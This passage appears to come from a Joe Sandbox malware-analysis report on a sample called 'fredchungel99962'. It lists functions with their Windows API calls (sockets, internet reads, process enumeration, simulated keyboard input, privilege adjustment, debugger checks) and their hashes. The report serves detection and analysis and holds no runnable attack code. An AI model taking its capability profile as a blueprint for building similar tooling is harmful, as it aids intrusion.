Opcode ID: 0a7baf9cfa779e02e74576c9f231f2602af00d9164a011840bee33be35375309
Instruction ID: f2c9f65c36ddb16f3f00a7acab0cc185a12fde96d38e50d0e345c3bc6048b151
Opcode Fuzzy Hash: 0a7baf9cfa779e02e74576c9f231f2602af00d9164a011840bee33be35375309
Instruction Fuzzy Hash: 19A28B74E2021ACBDF25CF58C8817EEB7B5FF44354F1481AAEA19A7285E7709981CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01331806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0133304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0133307A
Part of subcall function 0133304E: _wcslen.LIBCMT ref: 0133309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0133185D
WSAGetLastError.WSOCK32 ref: 01331884
bind.WSOCK32(00000000,?,00000010), ref: 013318DB
WSAGetLastError.WSOCK32 ref: 013318E6
closesocket.WSOCK32(00000000), ref: 01331915

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 45dfaa096329476c9d99eca0278f3c22adc5eb62915b80c429ede7d69ebc335a
Instruction ID: 69e4e57da9d0ad5be9080fe1bb44338652b1a2824af7cae5e9486d9f6c72ccca
Opcode Fuzzy Hash: 45dfaa096329476c9d99eca0278f3c22adc5eb62915b80c429ede7d69ebc335a
Instruction Fuzzy Hash: 6B51B675A002019FE720AF24C8C5F7ABBE5EB84758F04819CE9155F3D2CB71AD418BE5

Uniqueness

Uniqueness Score: -1.00%

Function 0132CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0132CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 0132CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0132C21E,00000000), ref: 0132CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0132C21E,00000000), ref: 0132CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0132C21E,00000000), ref: 0132CFF2

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 8ff46cab5c30e7b70e8f01c9434ba386ea5b9dfbd8ca4185fdd237f0e4093145
Instruction ID: 2a44f8e73f36c463faeb1b181287294d24ebe53d7232d927b78e6c1cbd0fbee3
Opcode Fuzzy Hash: 8ff46cab5c30e7b70e8f01c9434ba386ea5b9dfbd8ca4185fdd237f0e4093145
Instruction Fuzzy Hash: 4F314C71504615FFEB20EFA9C984EAFBBFCEB14758B10542EE616D2141DB30AA44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0133A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0133A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0133A6BA

Part of subcall function 012B9CB3: _wcslen.LIBCMT ref: 012B9CBD

Process32NextW.KERNEL32(00000000,?), ref: 0133A79C
CloseHandle.KERNEL32(00000000), ref: 0133A7AB

Part of subcall function 012CCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,012F3303,?), ref: 012CCE8A

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 0e73a8fb5dde5cf8b36084c184010c11fc0c5ecd755da906ad13469798c284ce
Instruction ID: d70fdbc380e43707c88569519193c84aafd1ec5dec5eff7843b36c54f158b3a8
Opcode Fuzzy Hash: 0e73a8fb5dde5cf8b36084c184010c11fc0c5ecd755da906ad13469798c284ce
Instruction Fuzzy Hash: 0B513BB5518301AFD710EF28C885A6BBBE8FFD9758F00491DF58997291EB31E904CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0131AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 0131ABF1
SetKeyboardState.USER32(00000080), ref: 0131AC0D
PostMessageW.USER32 ref: 0131AC74
SendInput.USER32(00000001,?,0000001C), ref: 0131ACC6

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 94b62758ccfe47ce84edb452aee5281e49f30a2f11f0f05d062cd2d16fe1b9c8
Instruction ID: 8f482ad9dde239940231ac73d91996292ec46041735dd6868364c460eda5a611
Opcode Fuzzy Hash: 94b62758ccfe47ce84edb452aee5281e49f30a2f11f0f05d062cd2d16fe1b9c8
Instruction Fuzzy Hash: 30315970A01398AFFF39CA69C8047FE7BA9AB8831AF04431AE485D31C9D33595818791

Uniqueness

Uniqueness Score: -1.00%

Function 01318298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 013182AA

Strings

(, xrefs: 013182F0
|, xrefs: 013182DA

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 74f1724800620d006d79d62035907773db7bd46f501178abf00d2945dc1792e6
Instruction ID: b40a1bff8de19453c1309ceca755be032a3f70e04c4b6d969d13715018ffa54f
Opcode Fuzzy Hash: 74f1724800620d006d79d62035907773db7bd46f501178abf00d2945dc1792e6
Instruction Fuzzy Hash: B1324674A007059FDB28CF19C480A6AB7F0FF48714B15C9AEE99ADB7A1E770E941CB44

Uniqueness

Uniqueness Score: -1.00%

Function 012E2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 012E271A
SetUnhandledExceptionFilter.KERNEL32 ref: 012E2724
UnhandledExceptionFilter.KERNEL32(?), ref: 012E2731

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 5bd73433cee084a30dae067218c69698ed2c2310670c0ba7d4ac4732e3929a9c
Instruction ID: 692463b6d8f2396c0b6f117621b061dc53fc194739a72bf5eb18b359c010cd72
Opcode Fuzzy Hash: 5bd73433cee084a30dae067218c69698ed2c2310670c0ba7d4ac4732e3929a9c
Instruction Fuzzy Hash: A931D67495121D9BCB21DF68D8887DCBBB8BF08310F5052EAE50CA7260EB309B818F45

Uniqueness

Uniqueness Score: -1.00%

Function 013251CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 013251DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 01325238
SetErrorMode.KERNEL32(00000000), ref: 013252A1

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 1708b6e186089129bc7c03501993c6832c2d30fe3049a1b3b545969401cb8df4
Instruction ID: 560651320a91974682a48355b9ce29d15767712c6c7ede08d32fdc7246be92d6
Opcode Fuzzy Hash: 1708b6e186089129bc7c03501993c6832c2d30fe3049a1b3b545969401cb8df4
Instruction Fuzzy Hash: 6E315A75A002199FDB00DF54D484AEDBBB4FF49318F048099E905AB395DB31E955CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013116C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 012CFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 012D0668
Part of subcall function 012CFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 012D0685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0131170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0131173A
GetLastError.KERNEL32 ref: 0131174A

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 24cd96d49a22e807b08532467b07a5f8ac2cbec16bf658a1a3a9c2689ed6b570
Instruction ID: 1255f1a2a53c07e43490db04763621e68552a72043c7edb542964f6f63a7e467
Opcode Fuzzy Hash: 24cd96d49a22e807b08532467b07a5f8ac2cbec16bf658a1a3a9c2689ed6b570
Instruction Fuzzy Hash: 2011C1B2410305AFD7289F64DC86DAABBBDFB04714B20851EE15653244EB70FC41CB20

Uniqueness

Uniqueness Score: -1.00%

Function 0131D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0131D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0131D645
CloseHandle.KERNEL32(?), ref: 0131D650

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 65f3fc389bc04c1f0c05e73f9c9b518ff1dc2152dfaf2ec82441a4a6a87652ab
Instruction ID: a0df10419263ff7bdc1860a3c9e0497f7e33fbb856a7a671213ee8948a7c8a7d
Opcode Fuzzy Hash: 65f3fc389bc04c1f0c05e73f9c9b518ff1dc2152dfaf2ec82441a4a6a87652ab
Instruction Fuzzy Hash: 1C11A175E01228BFDB208F98DC48FAFBFBCEB45B60F104111F904E7284C6705A018BA1

Uniqueness

Uniqueness Score: -1.00%

Function 01311663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0131168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 013116A1
FreeSid.ADVAPI32(?), ref: 013116B1

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 9615aab55eba785b3eb8746c4708920eb367fb6593c4742b48b96b5c30a41b0d
Instruction ID: 6ce4c0a88d5187f5a03ac66096dc74e2eca1d25177e81d5253b0243355f4d119
Opcode Fuzzy Hash: 9615aab55eba785b3eb8746c4708920eb367fb6593c4742b48b96b5c30a41b0d
Instruction Fuzzy Hash: 98F06775A4130CBBEF00CFE4C889EAEBBBCFB08304F004860EA00E2181E730EA048B50

Uniqueness

Uniqueness Score: -1.00%

Function 012D4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(012E28E9,?,012D4CBE,012E28E9,013788B8,0000000C,012D4E15,012E28E9,00000002,00000000,?,012E28E9), ref: 012D4D09
TerminateProcess.KERNEL32(00000000,?,012D4CBE,012E28E9,013788B8,0000000C,012D4E15,012E28E9,00000002,00000000,?,012E28E9), ref: 012D4D10
ExitProcess.KERNEL32 ref: 012D4D22

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 0f76739b3d06a1e1c1122ae19561067255d0eefb3a1085eb126010d0f66726d0
Instruction ID: e83e43a66163c6d29f5aef16b2dd0c9a9569d8bc8ed1c390a834ae29bf83a865
Opcode Fuzzy Hash: 0f76739b3d06a1e1c1122ae19561067255d0eefb3a1085eb126010d0f66726d0
Instruction Fuzzy Hash: 11E0B635011189AFCF21BF64D909A583F6DFB45782F144014FD058B526CB39EA42CF80

Uniqueness

Uniqueness Score: -1.00%

Function 012EC2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 012EC36C

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 943216bc4be73a39f4a89f521b9ba6d7209e9dabfbe63ae41151dac4407f33fc
Instruction ID: 51997139841cec79fa7bf35089a75a8bfad01fb824ae751243d45d3f029bc064
Opcode Fuzzy Hash: 943216bc4be73a39f4a89f521b9ba6d7209e9dabfbe63ae41151dac4407f33fc
Instruction Fuzzy Hash: 3441287691021AABDB249FFDCC4CDBB77F8EB84314F904269FA15D7180E6709E418B50

Uniqueness

Uniqueness Score: -1.00%

Function 0130D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0130D28C

Strings

X64, xrefs: 0130D2A8

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: a863d2ff7cfa0cfeeb8b7fdec7776602fba34154c7cbdc9f195d0821bc162bf0
Instruction ID: 227ceab175401305b5bc26238a366cc51873a2edb9979db268430ed4780c53aa
Opcode Fuzzy Hash: a863d2ff7cfa0cfeeb8b7fdec7776602fba34154c7cbdc9f195d0821bc162bf0
Instruction Fuzzy Hash: E9D0C9B481611DEBCB90CAD0D888DD9B3BCBB04355F000255F106A2040DB7095488F10

Uniqueness

Uniqueness Score: -1.00%

Function 012DCAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: fe317e9f343af6fa9e444c6875b6a39238ced8fa465c4a1cda21f46dbc493c43
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: 40022B71E1011A9FDF15CFA9C9806ADFBB1EF48324F25826ED919E7284D731A951CB80

Uniqueness

Uniqueness Score: -1.00%

Function 013268EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 01326918
FindClose.KERNEL32(00000000), ref: 01326961

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 5eb8d256cdcd43ff702edefb61ec58631dea2b38a09edae586e24eb790eb250a
Instruction ID: a43020ac043c8843a67824608d2d70bfd3b2777a24ff42aa6361bca2695a9dfc
Opcode Fuzzy Hash: 5eb8d256cdcd43ff702edefb61ec58631dea2b38a09edae586e24eb790eb250a
Instruction Fuzzy Hash: A111E2756142119FD710DF29D4C5A66BBE4FF85328F04C699E9698F7A2CB30EC05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013237B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,01334891,?,?,00000035,?), ref: 013237E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,01334891,?,?,00000035,?), ref: 013237F4

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: cd297877851889ec719a63de164957a2185fc5dbc3204b1e08278d96feca105e
Instruction ID: 8e17eb3a8fb8d771166dc05909ace856fdeb6eac47a40258e396b66db70ed253
Opcode Fuzzy Hash: cd297877851889ec719a63de164957a2185fc5dbc3204b1e08278d96feca105e
Instruction Fuzzy Hash: 77F0EC746053296BDB2026694C4CFEB765DEFC8765F000275F509D2284D9605944C7F0

Uniqueness

Uniqueness Score: -1.00%

Function 0131B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C), ref: 0131B25D
keybd_event.USER32 ref: 0131B270

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: a1dab650fa40b25d2fbd822c22bd4f13115781173f2a75eddc590ffd5b632ea3
Instruction ID: 552f76f5f29f00e0fa1ec7cdb55b076e1aaf505ee38fc0516d5536b796ae1330
Opcode Fuzzy Hash: a1dab650fa40b25d2fbd822c22bd4f13115781173f2a75eddc590ffd5b632ea3
Instruction Fuzzy Hash: 7AF06D7480424DABDB158FA0C805BEEBFB4FF04309F008009F951A5196C77982058F94

Uniqueness

Uniqueness Score: -1.00%

Function 013110BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,013111FC), ref: 013110D4
CloseHandle.KERNEL32(?), ref: 013110E9

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: a8dee2d745f8032863a85030a5b86d7fbde21503ecdcc3761a9cf32db120d9ba
Instruction ID: 95bf9c09611c8b1dd6675888524311e89f14d53d114885aaa8f69fc07612ef8e
Opcode Fuzzy Hash: a8dee2d745f8032863a85030a5b86d7fbde21503ecdcc3761a9cf32db120d9ba
